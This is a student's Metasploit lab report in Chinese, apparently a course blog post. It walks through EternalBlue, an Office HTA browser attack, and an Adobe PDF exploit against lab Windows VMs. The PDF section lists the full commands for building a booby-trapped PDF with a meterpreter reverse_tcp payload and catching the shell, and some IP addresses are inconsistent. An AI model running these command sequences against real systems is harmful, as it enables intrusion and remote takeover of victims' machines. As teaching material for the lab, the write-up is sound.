2018-2019 20165235 网络对抗 Exp5 MSF基础

2018-2019 20165235 网络对抗 Exp5 MSF基础

1. 实践内容(3.5分)

1.1一个主动攻击实践

攻击方:kali 192.168.21.130
靶机: win7 192.168.21.128
永恒之蓝漏洞是利用框架中一个针对SMB服务进行攻击的漏洞,该漏洞导致攻击者在目标系统上可以执行任意代码。
进入msfconsole 输入 use exploit/windows/smb/ms17_010_eternalblue。并且通过show payloads 显示可用攻击载荷。

设置tcp反向连接:

设置参数:

输入:exploit

渗透成功:

1.2 一个针对浏览器的攻击

攻击方:kali 192.168.21.130
靶机: win7 192.168.21.128
我们先启动msfconsole并使用模块use exploit/windows/fileformat/office_word_hta

查看目标show targets

show options,可以看到已经默认帮我们配置好了,我们只需要run执行即可,相应的产生了一个URL。

在靶机的IE浏览器中输入KALI中生成的URL,出现一个窗口,点击运行即可:

看到kali那里已经产生了session会话,我们按下回车回到命令行,使用sessions -i 1来与第一个session建立连接,再输入shell拿到权限:

输入指令测试,渗透陈成功:

1.3 一个针对客户端的攻击(Adobe)

本次实验在win7中实验并没有成功,于是我将靶机换成XP系统。
查看靶机ip:

kali输入msfconsole进入控制台,依次输入以下命令
攻击方:kali 192.168.21.130
靶机: win7 192.168.21.131
use windows/fileformat/adobe_cooltype_sing :选择攻击模块
set payload windows/meterpreter/reverse_tcp :设置tcp反向连接
set LHOST 192.168.21.130 :kali IP
set LPORT 5235 :设置攻击端口
set FILENAME 20165235.pdf :设置生成的pdf文件名
exploit :发起攻击

我是第二次做的时候截的屏,所以没有显示文件路径。将20165235.pdf复制到XP中。重启控制台,并且输入以下命令进入监听模块:
use exploit/multi/handler :进入监听模块
set payload windows/meterpreter/reverse_tcp :设置tcp反向连接
set LHOST 10.0.0.138 :kali IP
set LPORT 5330:设置攻击端口
exploit :监听

接着在XP中打开20165235.pdf文件:

渗透成功:

关闭20165235.pdf,连接断开:

1.4 成功应用任何一个辅助模块。

auxiliary/scanner/ftp/ftp_version

攻击方:kali 192.168.21.130
靶机: win7 192.169.21.128
本次的模块是通过MSF渗透帮助手册中找到的。功能是可以查询到某一网段中的ftp服务器以及其操作系统的类型。
首先在win7中搭建一个ftp服务器,具体的过程可以上网查找。一下是搭建好的ftp服务器:

测试ftp服务器是否可用:

进入msfconsole,输入use auxiliary/scanner/ftp/ftp_version,设置要扫描的网段范围:set RHOSTS 192.168.21.1-254,设置线程数:set THREADS 55,(线程数是每次扫描的主机个数。),直接输入run即可看到结果:192.168.21.128:被扫描出来,并分析出是微软的Windows操作系统。

auxiliary/scanner/portscan/tcp

攻击方:kali 192.168.21.130
靶机: win7 192.168.21.128
创建msf所需的数据库:
service postgresql start
msfdb start
进入msfconsole,使用auxiliary/scanner/portscan/tcp模块,用来扫描靶机的TCP端口使用情况。执行命令use auxiliary/scanner/portscan/tcp进入并使用模块:输入show options查看需要设置的参数信息:

设置参数:set RHOSTS 192.168.21.128set PROTS 1 - 5235(扫描1到5235端口),之后使用run,进行扫描。

2 报告内容:

2.1.基础问题回答

(1)用自己的话解释什么是exploit,payload,encode.

  • exploit:exploit字面上的意思是“开拓、开发”,exploit就是利用一切可以利用的工具、采用一切可以采用的方法、找到一切可以找到的漏洞,并且通过对漏洞资料的分析研究,从而达到获取网站用户资料文档、添加自定义用户、甚至侵入网站获得管理员权限控制整个网站的最终目的。但是在MSF中,exploit将负责攻击的代码payload传送到靶机中。
  • payload:payload是指:有效载荷。它是靶机被渗透攻击之后执行的恶意代码。
  • encode:是编码的意思。将payload进行多次编码后,使改变其形态。

2.2.实践总结与体会

通过本次的实践,学会了利用MSF进行多种方式的渗透,不敢说能灵活应用并且实战,但是学到了不少东西。在进行实验时,网上的资料太少,而且对好多模块并不知道它的意思以及用法,于是我就翻出它的英文帮助手册,利用翻译软件看懂了使用方法。在以后的学习过程中一定要活学活用。

2.3.离实战还缺些什么技术或步骤

首先是攻击手法单一,应用不灵活,在实战中要求使用多种方法,学会去扫描靶机的漏洞以及可用的端口等。要真正的应用于实战就要我们能灵活的使用MSF提供的大部分的攻击手段,同时也得学会使用其他的攻击平台。

posted @ 2019-04-15 14:00  养浩  阅读(290)  评论(0编辑  收藏  举报